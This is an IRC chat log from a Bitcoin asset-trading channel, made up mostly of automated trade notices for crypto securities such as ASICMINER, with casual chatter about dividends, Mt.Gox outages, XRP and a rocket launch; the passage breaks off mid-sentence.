22:41:01 [BTCTC] [ASICMINER-PT] 2 @ 1.753 = 3.506 BTC [-] May 15 22:41:38 cux everyone has dividend money to spend May 15 22:41:48 a shit ton of money just got paid out May 15 22:41:55 what TAT said May 15 22:42:09 Oh cool. May 15 22:42:20 I presume havelock investors will have to wait a bit? May 15 22:42:31 yeah May 15 22:42:42 Havelock's software doesnt let me do dame-day payouts May 15 22:42:45 [BTCTC] [ASICMINER-PT] 1 @ 1.752 BTC [-] May 15 22:42:47 same-day May 15 22:44:09 lol May 15 22:44:14 BTCT s hanging May 15 22:44:28 after 3 orders May 15 22:44:37 ;;ticker --last May 15 22:44:48 Error: Failure to retrieve ticker. Try again later. May 15 22:44:55 112.60 May 15 22:45:17 sell sell sell May 15 22:45:17 [BTCTC] [ASICMINER-PT] 2 @ 1.7495 = 3.499 BTC [-] May 15 22:45:39 99.9 on btce May 15 22:46:12 but btc-e is always like 5-10% lower right? May 15 22:46:15 usually May 15 22:46:25 yep May 15 22:46:50 its down about $8 from 2 hours ago though May 15 22:47:26 retest $78 ? May 15 22:47:39 retest 50 May 15 22:47:45 :-P May 15 22:47:51 retest 15 May 15 22:47:52 ### exception in _http_thread_func: No JSON object could be decoded BTCUSD/money/order/add May 15 22:48:00 lol, not that much May 15 22:48:05 gox socket is not good right now. May 15 22:48:13 50 is ok May 15 22:48:45 $avg May 15 22:48:47 deadweasel: 110.36 May 15 22:49:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.017411 = 0.0348 BTC [+] May 15 22:51:04 [HAVELOCK] [ASICM] 6 @ 0.01785 = 0.1071 BTC [+] May 15 22:51:35 [BTCTC] [ASICMINER-PT] 3 @ 1.789 = 5.367 BTC [+] May 15 22:53:38 dividends! May 15 22:55:51 \o/ May 15 22:58:14 this is silly May 15 22:59:59 [BTCTC] [ASICMINER-PT] 1 @ 1.789 BTC [+] May 15 23:00:22 [BTCTC] [TAT.ASICMINER] 16 @ 0.017411 = 0.2786 BTC [+] May 15 23:02:04 [HAVELOCK] [ASICM] 29 @ 0.0176 = 0.5104 BTC [-] May 15 23:02:06 [HAVELOCK] [ASICM] 254 @ 0.0175 = 4.445 BTC [-] May 15 23:02:06 [HAVELOCK] [ASICM] 10 @ 0.01741 = 0.1741 BTC [-] May 15 23:05:04 [HAVELOCK] [ASICM] 11 @ 0.0177 = 0.1947 BTC [+] May 15 23:05:26 [BTCTC] [ASICMINER-PT] 7 @ 1.789999 = 12.53 BTC [+] May 15 23:06:31 I think mtgox engine is about to come back online May 15 23:07:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.017411 = 0.1741 BTC [+] May 15 23:08:04 [HAVELOCK] [SDICE] 4 @ 0.275 = 1.1 BTC [+] May 15 23:09:05 [HAVELOCK] [SDICE] 2 @ 0.275 = 0.55 BTC [+] May 15 23:10:05 [BTCTC] [ASICMINER-PT] 3 @ 1.789 = 5.367 BTC [-] May 15 23:12:04 [HAVELOCK] [ASICM] 18 @ 0.0177 = 0.3186 BTC [+] May 15 23:12:05 [HAVELOCK] [ASICM] 192 @ 0.01785 = 3.4272 BTC [+] May 15 23:12:07 [HAVELOCK] [ASICM] 250 @ 0.01787 = 4.4675 BTC [+] May 15 23:12:08 [HAVELOCK] [ASICM] 200 @ 0.017885 = 3.577 BTC [+] May 15 23:13:04 *mtgox engine sputters and dies* May 15 23:14:17 yeah, it shit the bed again May 15 23:14:53 dont even care anymore May 15 23:14:55 <3 securities May 15 23:15:02 but i can't be bothered with gox. instead, am very curious why s.mpoe spread suddenly narrowed after May 11 May 15 23:15:47 [MPEX] [S.DICE] 725 @ 0.00285004 = 2.0663 BTC [+] May 15 23:16:05 [MPEX] [S.DICE] 3 @ 0.00285003 = 0.0086 BTC [-] May 15 23:16:24 [MPEX] [S.DICE] 167 @ 0.00285001 = 0.476 BTC [-] May 15 23:16:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199897 BTC [+] May 15 23:17:04 [HAVELOCK] [ASICM] 250 @ 0.01999999 = 5 BTC [+] May 15 23:18:04 [HAVELOCK] [ASICM] 256 @ 0.0195 = 4.992 BTC [-] May 15 23:18:14 [BTCTC] [ASICMINER-PT] 2 @ 1.789 = 3.578 BTC [-] May 15 23:18:26 so crypto-trade has been "coming soon" for a few months now it seems May 15 23:18:59 it is opening when ziggap reopens May 15 23:19:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.017411 = 0.0348 BTC [+] May 15 23:19:36 [HAVELOCK] [SDICE] 1 @ 0.2749 BTC [-] May 15 23:19:38 [HAVELOCK] [SDICE] 2 @ 0.2749 = 0.5498 BTC [-] May 15 23:20:04 [HAVELOCK] [SDICE] 4 @ 0.2749 = 1.0996 BTC [-] May 15 23:21:04 [HAVELOCK] [ASICM] 6 @ 0.01925 = 0.1155 BTC [-] May 15 23:22:04 [HAVELOCK] [ASICM] 100 @ 0.0195 = 1.95 BTC [+] May 15 23:22:06 [HAVELOCK] [ASICM] 10 @ 0.0195 = 0.195 BTC [+] May 15 23:22:42 wow May 15 23:22:44 wow May 15 23:22:45 [MPEX] [S.MPOE] 20000 @ 0.00066772 = 13.3544 BTC [-] May 15 23:23:05 [HAVELOCK] [SDICE] 4 @ 0.2749 = 1.0996 BTC [-] May 15 23:23:05 [HAVELOCK] [SDICE] 1 @ 0.2749 BTC [-] May 15 23:25:27 [BTCTC] [ASICMINER-PT] 3 @ 1.789999 = 5.37 BTC [+] May 15 23:27:31 [MPEX] [S.MPOE] 8214 @ 0.00066582 = 5.469 BTC [-] May 15 23:27:33 [MPEX] [S.MPOE] 786 @ 0.00066484 = 0.5226 BTC [-] May 15 23:28:46 [BTCTC] [ASICMINER-PT] 1 @ 1.789 BTC [-] May 15 23:29:04 [HAVELOCK] [ASICM] 100 @ 0.0192 = 1.92 BTC [-] May 15 23:30:05 [HAVELOCK] [ASICM] 178 @ 0.0192 = 3.4176 BTC [-] May 15 23:32:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.017411 = 0.0348 BTC [+] May 15 23:35:05 [HAVELOCK] [ASICM] 121 @ 0.0192 = 2.3232 BTC [-] May 15 23:35:26 Wow. May 15 23:35:51 I'll still hold on though, even though that is a fantastic price. May 15 23:37:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.017411 = 0.2089 BTC [+] May 15 23:37:48 [BTCTC] [ASICMINER-PT] 8 @ 1.789 = 14.312 BTC [-] May 15 23:40:06 [HAVELOCK] [ASICM] 1 @ 0.01919999 BTC [-] May 15 23:44:05 [HAVELOCK] [HIM] 1 @ 2.15 BTC [+] May 15 23:44:59 [BTCTC] [ASICMINER-PT] 3 @ 1.789999 = 5.37 BTC [+] May 15 23:46:05 [HAVELOCK] [ASICM] 10 @ 0.01915 = 0.1915 BTC [-] May 15 23:46:24 [MPEX] [S.MPOE] 8350 @ 0.00066772 = 5.5755 BTC [+] May 15 23:50:04 [HAVELOCK] [ASICM] 2 @ 0.01915 = 0.0383 BTC [-] May 15 23:50:18 [BTCTC] [ASICMINER-PT] 1 @ 1.789 BTC [-] May 15 23:51:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.01749 BTC [+] May 15 23:51:05 [HAVELOCK] [ASICM] 1 @ 0.0185 BTC [-] May 15 23:53:38 http://www.nypost.com/p/news/local/manhattan/disney_world_srich_kid_outrage_zTBA0xrvZRkIVc1zItXGDP May 15 23:54:05 [HAVELOCK] [ASICM] 25 @ 0.0191 = 0.4775 BTC [+] May 15 23:54:06 [HAVELOCK] [ASICM] 82 @ 0.0191 = 1.5662 BTC [+] May 15 23:55:21 Dr. Wednesday Martin, social anthropologist who discovered scheme...befitting May 15 23:56:34 [BTCTC] [ASICMINER-PT] 1 @ 1.7885 BTC [-] May 15 23:57:24 we need more such investigative anthropogists in bitcoinland May 15 23:57:25 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [-] May 15 23:58:04 [HAVELOCK] [ASICM] 336 @ 0.0181 = 6.0816 BTC [-] May 15 23:58:06 [HAVELOCK] [ASICM] 500 @ 0.01800001 = 9 BTC [-] May 16 00:01:21 reptilia unceasingly delivers: https://bitcointalk.org/index.php?topic=204142.msg2152938#msg2152938 May 16 00:01:39 he has very interesting taxes strategy May 16 00:02:48 and seems he wants to go to san jose.. watch out May 16 00:04:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.01749 = 0.07 BTC [+] May 16 00:05:49 apparently his "entry point" has moved down to 3 May 16 00:05:52 pretty cool. May 16 00:06:42 [MPEX] [S.MPOE] 11800 @ 0.00067116 = 7.9197 BTC [+] May 16 00:06:45 [BTCTC] [ASICMINER-PT] 5 @ 1.78 = 8.9 BTC [-] May 16 00:09:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.0175 = 0.035 BTC [+] May 16 00:10:21 does whomever runs havelock hang out in here? May 16 00:10:39 topace does indeed May 16 00:10:48 inhies: see http://bitcoin-assets.com/ May 16 00:11:05 [HAVELOCK] [ASICM] 107 @ 0.01865 = 1.9956 BTC [+] May 16 00:11:22 i see no topace present :( May 16 00:11:26 thanks jurov i always forget that damn link May 16 00:11:39 cnat raed? May 16 00:11:42 ;) May 16 00:11:52 topace is there May 16 00:12:27 jurov: no i mean, here May 16 00:12:33 theres no user topace present May 16 00:12:40 ah ok, sorry May 16 00:13:04 ;;seen topace May 16 00:13:04 topace was last seen in #bitcoin-assets 6 days, 23 hours, 18 minutes, and 6 seconds ago: and thats without any sort of announcement going out to current havelock customers :p May 16 00:13:06 ;;seen topace_ May 16 00:13:07 topace_ was last seen in #bitcoin-assets 2 days, 15 hours, 56 minutes, and 14 seconds ago: !ticker h asicm May 16 00:13:08 I can get a message to him May 16 00:13:12 if you need me to May 16 00:13:49 ThickAsThieves: its nothing important, thank you though May 16 00:14:03 word May 16 00:17:35 [BTCTC] [ASICMINER-PT] 2 @ 1.78845 = 3.5769 BTC [+] May 16 00:18:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.017512 = 0.1751 BTC [+] May 16 00:22:21 [BTCTC] [TAT.ASICMINER] 12 @ 0.0175 = 0.21 BTC [-] May 16 00:22:22 [MPEX] [S.MPOE] 3766 @ 0.00067116 = 2.5276 BTC [+] May 16 00:22:24 [MPEX] [S.MPOE] 3535 @ 0.00066905 = 2.3651 BTC [-] May 16 00:22:35 [MPEX] [S.MPOE] 7549 @ 0.0006688 = 5.0488 BTC [-] May 16 00:23:54 http://venturebeat.com/2013/05/14/twitter-hate-map-shows-where-racist-homophobic-and-offensive-tweets-originate/ May 16 00:23:57 lewl May 16 00:25:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.017512 = 0.07 BTC [+] May 16 00:26:24 [BTCTC] [ASICMINER-PT] 5 @ 1.750047 = 8.7502 BTC [-] May 16 00:28:05 [HAVELOCK] [ASICM] 108 @ 0.01845999 = 1.9937 BTC [-] May 16 00:29:45 [BTCTC] [ASICMINER-PT] 5 @ 1.750047 = 8.7502 BTC [-] May 16 00:29:55 My laptop with my private keys on is overheating. I think I might just leave it unattended in the sauna. May 16 00:31:42 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 16 00:34:38 http://www.ulalaunch.com/site/pages/Webcast.shtml 4 minutes and counting til lift off May 16 00:35:05 [HAVELOCK] [ASICM] 56 @ 0.01809999 = 1.0136 BTC [-] May 16 00:36:15 [BTCTC] [ASICMINER-PT] 6 @ 1.765 = 10.59 BTC [-] May 16 00:38:11 [BTCTC] [PAJKA.BOND] 2 @ 0.10301 = 0.206 BTC [-] May 16 00:38:17 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 16 00:38:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.01749 = 0.2624 BTC [-] May 16 00:39:32 you missed it May 16 00:39:45 :) May 16 00:39:58 looks like a giant flaming dildo May 16 00:40:32 well endowed space junk May 16 00:41:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.017512 = 0.0876 BTC [+] May 16 00:43:56 1,300 MPH May 16 00:50:09 [BTCTC] [PAJKA.BOND] 2 @ 0.10301 = 0.206 BTC [-] May 16 00:50:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.01749 = 0.035 BTC [-] May 16 00:51:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.017512 = 0.0876 BTC [+] May 16 00:53:24 why would anyone give a shit about ULA May 16 00:53:31 [BTCTC] [ASICMINER-PT] 1 @ 1.750001 BTC [-] May 16 00:53:48 study hard kids. May 16 00:53:54 stay out of trouble. May 16 00:54:16 same old gubbermint contractors leeching your money producing no new technology May 16 00:54:53 yes, but it might explode on launch. May 16 00:55:06 oh, right May 16 00:55:28 [BTCTC] [TAT.ASICMINER] 28 @ 0.017512 = 0.4903 BTC [+] May 16 00:56:05 [HAVELOCK] [VTX] 1 @ 0.4495 BTC [-] May 16 01:00:05 [HAVELOCK] [HIM] 1 @ 2.0501 BTC [-] May 16 01:00:12 i keep getting people pming me to buy my XRP May 16 01:00:26 this latest guy, i said 500XRP for 1BTC May 16 01:00:36 he laughed and offered way less May 16 01:00:48 some bullshit metacoin May 16 01:01:30 what is a PT? May 16 01:01:38 personal trainer May 16 01:01:59 TAT I sold my free XRP for 0.43 / 40k ;/ May 16 01:02:02 sucks May 16 01:02:15 i told him that was my price for someone with ziggap.com in his forum signature May 16 01:02:22 I mean a pass throught. May 16 01:02:26 *through May 16 01:02:43 [BTCTC] [PAJKA.BOND] 1 @ 0.103 BTC [-] May 16 01:02:48 didn't think that a premined coin like that would reach such insane levels May 16 01:03:06 [HAVELOCK] [ASICM] 7 @ 0.0181 = 0.1267 BTC [+] May 16 01:04:05 [HAVELOCK] [ASICM] 166 @ 0.0181 = 3.0046 BTC [+] May 16 01:04:07 [HAVELOCK] [ASICM] 5 @ 0.0181 = 0.0905 BTC [+] May 16 01:05:06 [HAVELOCK] [HIM] 2 @ 2.05 = 4.1 BTC [-] May 16 01:05:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.017512 = 0.07 BTC [+] May 16 01:06:05 [HAVELOCK] [ASICM] 6 @ 0.0179 = 0.1074 BTC [-] May 16 01:06:07 [HAVELOCK] [ASICM] 10 @ 0.018 = 0.18 BTC [+] May 16 01:06:08 [HAVELOCK] [ASICM] 4 @ 0.0179 = 0.0716 BTC [-] May 16 01:06:36 hehe May 16 01:06:40 should go like triple in value May 16 01:06:45 now that google plunked down 200k May 16 01:06:48 for ripple May 16 01:06:57 [BTCTC] [ASICMINER-PT] 1 @ 1.779999 BTC [+] May 16 01:07:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.01749 = 0.1049 BTC [-] May 16 01:07:48 maybe you could pay google 300k to invest 200k with you May 16 01:07:54 just for hype and bubble ride May 16 01:08:00 could be worth it May 16 01:08:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.017512 = 0.0876 BTC [+] May 16 01:08:55 well you are not really paying someone more than bribing May 16 01:09:05 [HAVELOCK] [ASICM] 6 @ 0.0179 = 0.1074 BTC [-] May 16 01:09:39 https://bitcointalk.org/index.php?topic=206017.0 May 16 01:09:41 lol May 16 01:10:05 [HAVELOCK] [KCIM] 1 @ 1.32 BTC [-] May 16 01:11:06 [HAVELOCK] [ASICM] 10 @ 0.018 = 0.18 BTC [+] May 16 01:11:12 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [-] May 16 01:13:28 [BTCTC] [TAT.ASICMINER] 27 @ 0.01749 = 0.4722 BTC [-] May 16 01:14:06 [HAVELOCK] [ASICM] 63 @ 0.018 = 1.134 BTC [+] May 16 01:16:05 [HAVELOCK] [ASICM] 100 @ 0.01805 = 1.805 BTC [+] May 16 01:17:09 [HAVELOCK] [ASICM] 229 @ 0.01805 = 4.1335 BTC [+] May 16 01:18:05 [HAVELOCK] [ASICM] 250 @ 0.01805 = 4.5125 BTC [+] May 16 01:18:06 [HAVELOCK] [ASICM] 21 @ 0.01805 = 0.3791 BTC [+] May 16 01:18:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.017512 BTC [+] May 16 01:22:05 [HAVELOCK] [ASICM] 50 @ 0.01805 = 0.9025 BTC [+] May 16 01:22:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.017512 BTC [+] May 16 01:23:05 [HAVELOCK] [ASICM] 200 @ 0.01805 = 3.61 BTC [+] May 16 01:23:07 [HAVELOCK] [ASICM] 50 @ 0.01805 = 0.9025 BTC [+] May 16 01:23:08 [HAVELOCK] [ASICM] 3 @ 0.01805 = 0.0542 BTC [+] May 16 01:23:09 [HAVELOCK] [ASICM] 200 @ 0.01805 = 3.61 BTC [+] May 16 01:24:05 [HAVELOCK] [ASICM] 200 @ 0.01805 = 3.61 BTC [+] May 16 01:25:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.01749 = 0.035 BTC [-] May 16 01:26:06 [HAVELOCK] [HIM] 2 @ 2 = 4 BTC [-] May 16 01:26:19 [BTCTC] [TAT.ASICMINER] 41 @ 0.017512 = 0.718 BTC [+] May 16 01:26:51 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 16 01:27:05 [HAVELOCK] [ASICM] 20 @ 0.01805 = 0.361 BTC [+] May 16 01:27:07 [HAVELOCK] [ASICM] 27 @ 0.01805 = 0.4874 BTC [+] May 16 01:28:05 [HAVELOCK] [ASICM] 21 @ 0.01805 = 0.3791 BTC [+] May 16 01:28:07 [HAVELOCK] [ASICM] 50 @ 0.01805 = 0.9025 BTC [+] May 16 01:29:05 [HAVELOCK] [ASICM] 2 @ 0.01809 = 0.0362 BTC [+] May 16 01:30:05 [HAVELOCK] [ASICM] 210 @ 0.01809 = 3.7989 BTC [+] May 16 01:30:06 [HAVELOCK] [ASICM] 8 @ 0.01809 = 0.1447 BTC [+] May 16 01:31:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.017512 BTC [+] May 16 01:31:54 [BTCTC] [TAT.ASICMINER] 12 @ 0.01751 = 0.2101 BTC [-] May 16 01:33:05 [HAVELOCK] [ASICM] 1 @ 0.01809 BTC [+] May 16 01:34:06 [HAVELOCK] [ASICM] 11 @ 0.01809 = 0.199 BTC [+] May 16 01:34:08 [HAVELOCK] [ASICM] 100 @ 0.0179 = 1.79 BTC [-] May 16 01:36:07 [HAVELOCK] [ASICM] 2 @ 0.0179 = 0.0358 BTC [-] May 16 01:36:08 [BTCTC] [TAT.ASICMINER] 13 @ 0.01751 = 0.2276 BTC [-] May 16 01:36:54 [MPEX] [S.MPOE] 4601 @ 0.0006688 = 3.0771 BTC [-] May 16 01:36:55 [MPEX] [S.MPOE] 9200 @ 0.00066706 = 6.137 BTC [-] May 16 01:36:58 [MPEX] [S.MPOE] 99 @ 0.00066662 = 0.066 BTC [-] May 16 01:39:40 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [+] May 16 01:42:20 [BTCTC] [B.YABMC] 20 @ 0.0165 = 0.33 BTC [-] May 16 01:46:48 ;;later tell Uglux Just checking in :) May 16 01:46:49 The operation succeeded. May 16 01:47:05 [HAVELOCK] [VTX] 10 @ 0.4291 = 4.291 BTC [-] May 16 01:47:52 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 16 01:50:05 [HAVELOCK] [ASICM] 13 @ 0.0179 = 0.2327 BTC [-] May 16 01:50:07 [HAVELOCK] [ASICM] 95 @ 0.0179 = 1.7005 BTC [-] May 16 01:52:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.017739 = 0.3548 BTC [+] May 16 01:53:06 [HAVELOCK] [ASICM] 142 @ 0.01824 = 2.5901 BTC [+] May 16 01:54:05 [HAVELOCK] [ASICM] 2 @ 0.01824 = 0.0365 BTC [+] May 16 01:54:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.017739 = 0.0355 BTC [+] May 16 01:57:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.017739 = 0.7096 BTC [+] May 16 01:57:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.017739 = 0.1419 BTC [+] May 16 01:58:03 !ticker h asicm May 16 01:58:04 [HAVELOCK:ASICM] 1D: 0.01580000 / 0.01757355 / 0.01999999 (12339 shares, 216.84003098 BTC), 7D: 0.01352000 / 0.01560645 / 0.02820000 (59425 shares, 927.41305034 BTC), 30D: 0.01290000 / 0.01541886 / 0.02820000 (65062 shares, 1003.18196534 BTC) May 16 01:58:47 [BTCTC] [TAT.ASICMINER] 55 @ 0.017739 = 0.9756 BTC [+] May 16 01:59:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.017739 = 0.0887 BTC [+] May 16 02:00:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.017739 = 0.2129 BTC [+] May 16 02:03:06 [HAVELOCK] [ASICM] 356 @ 0.01824 = 6.4934 BTC [+] May 16 02:03:13 [MPEX] [S.MPOE] 7250 @ 0.00067125 = 4.8666 BTC [+] May 16 02:03:14 [MPEX] [S.MPOE] 4700 @ 0.00067123 = 3.1548 BTC [-] May 16 02:03:31 [BTCTC] [ASICMINER-PT] 1 @ 1.750001 BTC [+] May 16 02:05:05 [HAVELOCK] [ASICM] 1 @ 0.018245 BTC [+] May 16 02:06:06 [HAVELOCK] [ASICM] 2 @ 0.018245 = 0.0365 BTC [+] May 16 02:06:07 [HAVELOCK] [ASICM] 142 @ 0.01824 = 2.5901 BTC [-] May 16 02:06:27 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [-] May 16 02:08:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.017745 = 0.1775 BTC [+] May 16 02:09:06 [HAVELOCK] [ASICM] 10 @ 0.018245 = 0.1825 BTC [+] May 16 02:09:07 [HAVELOCK] [ASICM] 10 @ 0.018245 = 0.1825 BTC [+] May 16 02:10:07 [MPEX] [S.MPOE] 8100 @ 0.00066662 = 5.3996 BTC [-] May 16 02:11:06 [HAVELOCK] [KCIM] 1 @ 1.3201 BTC [+] May 16 02:11:22 [BTCTC] [TAT.ASICMINER] 14 @ 0.017739 = 0.2483 BTC [-] May 16 02:12:51 [BTCTC] [TAT.ASICMINER] 27 @ 0.017745 = 0.4791 BTC [+] May 16 02:14:06 [HAVELOCK] [ASICM] 73 @ 0.018245 = 1.3319 BTC [+] May 16 02:14:06 [BTCTC] [S.DICE-PT] 30 @ 0.00357 = 0.1071 BTC [-] May 16 02:15:05 [HAVELOCK] [ASICM] 13 @ 0.018245 = 0.2372 BTC [+] May 16 02:15:07 [HAVELOCK] [ASICM] 2 @ 0.01824 = 0.0365 BTC [-] May 16 02:15:08 [HAVELOCK] [ASICM] 487 @ 0.018 = 8.766 BTC [-] May 16 02:15:09 [HAVELOCK] [ASICM] 3 @ 0.018245 = 0.0547 BTC [+] May 16 02:22:06 [HAVELOCK] [ASICM] 12 @ 0.0181 = 0.2172 BTC [-] May 16 02:22:28 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [-] May 16 02:22:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.01776 = 0.0355 BTC [+] May 16 02:23:06 [HAVELOCK] [ASICM] 13 @ 0.018 = 0.234 BTC [-] May 16 02:23:07 [HAVELOCK] [ASICM] 53 @ 0.0179 = 0.9487 BTC [-] May 16 02:23:08 [HAVELOCK] [ASICM] 134 @ 0.0178 = 2.3852 BTC [-] May 16 02:25:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.01776 = 0.0888 BTC [+] May 16 02:25:31 [HAVELOCK] [ASICM] 5 @ 0.0182425 = 0.0912 BTC [+] May 16 02:27:07 [HAVELOCK] [ASICM] 2 @ 0.01824 = 0.0365 BTC [-] May 16 02:27:07 [HAVELOCK] [ASICM] 195 @ 0.01824 = 3.5568 BTC [-] May 16 02:27:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.0177 = 0.354 BTC [-] May 16 02:28:06 [HAVELOCK] [ASICM] 60 @ 0.01789 = 1.0734 BTC [-] May 16 02:28:07 [HAVELOCK] [ASICM] 10 @ 0.0178 = 0.178 BTC [-] May 16 02:28:09 [HAVELOCK] [ASICM] 480 @ 0.01780001 = 8.544 BTC [+] May 16 02:29:06 [HAVELOCK] [ASICM] 28 @ 0.0181 = 0.5068 BTC [+] May 16 02:30:06 [HAVELOCK] [ASICM] 1 @ 0.0181 BTC [+] May 16 02:30:07 [HAVELOCK] [ASICM] 158 @ 0.0179 = 2.8282 BTC [-] May 16 02:30:09 [HAVELOCK] [ASICM] 1 @ 0.01783629 BTC [-] May 16 02:30:10 [HAVELOCK] [ASICM] 20 @ 0.01780001 = 0.356 BTC [-] May 16 02:30:11 [HAVELOCK] [ASICM] 16 @ 0.0178 = 0.2848 BTC [-] May 16 02:30:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.01751 = 0.2101 BTC [-] May 16 02:32:05 [HAVELOCK] [ASICM] 4 @ 0.0178 = 0.0712 BTC [-] May 16 02:33:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.0175 = 0.105 BTC [-] May 16 02:33:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.0175 = 0.07 BTC [-] May 16 02:34:06 [HAVELOCK] [SDICE] 1 @ 0.2591001 BTC [-] May 16 02:34:46 [BTCTC] [ASICMINER-PT] 1 @ 1.787499 BTC [+] May 16 02:35:06 [HAVELOCK] [SDICE] 2 @ 0.259 = 0.518 BTC [-] May 16 02:36:07 [HAVELOCK] [ASICM] 170 @ 0.0179 = 3.043 BTC [+] May 16 02:37:38 [HAVELOCK] [SDICE] 7 @ 0.2502 = 1.7514 BTC [-] May 16 02:38:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.017769 = 0.0711 BTC [+] May 16 02:39:06 [HAVELOCK] [ASICM] 100 @ 0.01795 = 1.795 BTC [+] May 16 02:41:06 [HAVELOCK] [ASICM] 6 @ 0.01771 = 0.1063 BTC [-] May 16 02:42:07 [HAVELOCK] [ASICM] 1 @ 0.0177 BTC [-] May 16 02:42:08 [HAVELOCK] [ASICM] 499 @ 0.0176 = 8.7824 BTC [-] May 16 02:45:07 [HAVELOCK] [ASICM] 1 @ 0.0176 BTC [-] May 16 02:45:08 [HAVELOCK] [ASICM] 1 @ 0.01751 BTC [-] May 16 02:45:09 [HAVELOCK] [ASICM] 1 @ 0.01722958 BTC [-] May 16 02:45:10 [HAVELOCK] [ASICM] 10 @ 0.017 = 0.17 BTC [-] May 16 02:45:11 [HAVELOCK] [ASICM] 1 @ 0.0169 BTC [-] May 16 02:45:12 [HAVELOCK] [ASICM] 30 @ 0.01686 = 0.5058 BTC [-] May 16 02:45:38 [BTCTC] [TAT.ASICMINER] 26 @ 0.01752 = 0.4555 BTC [-] May 16 02:46:06 [HAVELOCK] [ASICM] 75 @ 0.01768 = 1.326 BTC [+] May 16 02:47:06 [HAVELOCK] [VTX] 1 @ 0.429 BTC [-] May 16 02:48:05 [BTCTC] [COGNITIVE] 1 @ 0.21 BTC [-] May 16 02:48:07 [HAVELOCK] [ASICM] 8 @ 0.0177 = 0.1416 BTC [+] May 16 02:49:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0175 = 0.175 BTC [-] May 16 02:51:06 [HAVELOCK] [VTX] 1 @ 0.429 BTC [-] May 16 02:52:06 [HAVELOCK] [ASICM] 183 @ 0.0176 = 3.2208 BTC [-] May 16 02:52:35 [BTCTC] [ASICMINER-PT] 1 @ 1.787499 BTC [+] May 16 02:53:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.017485 = 0.0699 BTC [-] May 16 02:54:06 [HAVELOCK] [ASICM] 25 @ 0.0177 = 0.4425 BTC [+] May 16 02:55:19 [BTCTC] [ASICMINER-PT] 1 @ 1.7875 BTC [+] May 16 02:56:40 [BTCTC] [ASICMINER-PT] 1 @ 1.7875 BTC [+] May 16 02:58:07 [HAVELOCK] [ASICM] 7 @ 0.0177 = 0.1239 BTC [+] May 16 02:58:55 [BTCTC] [TAT.ASICMINER] 13 @ 0.017769 = 0.231 BTC [+] May 16 02:59:40 [BTCTC] [ASICMINER-PT] 2 @ 1.7875 = 3.575 BTC [+] May 16 03:03:00 [BTCTC] [TAT.ASICMINER] 14 @ 0.01776 = 0.2486 BTC [-] May 16 03:04:21 hi. Having a big problem with the site, I won a bet and elected the winnings to be paid back to the originating address, however it never happened. Can someone who works fo rthe site PM me please. May 16 03:04:44 [BTCTC] [S.MPOE-PT] 4 @ 0.000666 = 0.0027 BTC [+] May 16 03:05:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.01776 = 0.0355 BTC [-] May 16 03:06:42 sure tbux May 16 03:06:46 thanks May 16 03:07:53 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [-] May 16 03:08:07 [HAVELOCK] [ASICM] 100 @ 0.01769337 = 1.7693 BTC [-] May 16 03:08:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.01776 = 0.0533 BTC [-] May 16 03:09:07 [HAVELOCK] [ASICM] 210 @ 0.0177 = 3.717 BTC [+] May 16 03:10:06 [HAVELOCK] [ASICM] 1 @ 0.01824 BTC [+] May 16 03:12:06 [HAVELOCK] [ASICM] 1 @ 0.01824 BTC [+] May 16 03:15:11 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 16 03:16:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.017765 = 0.0533 BTC [+] May 16 03:16:37 [BTCTC] [S.MPOE-PT] 3 @ 0.000666 = 0.002 BTC [+] May 16 03:17:50 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 16 03:17:52 wtf May 16 03:18:11 ah May 16 03:18:13 option May 16 03:19:09 hm May 16 03:19:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.017765 = 0.0711 BTC [+] May 16 03:19:15 that should be more clear May 16 03:19:41 iirc the assbot knows its an option, is just not tellin. May 16 03:20:30 what an 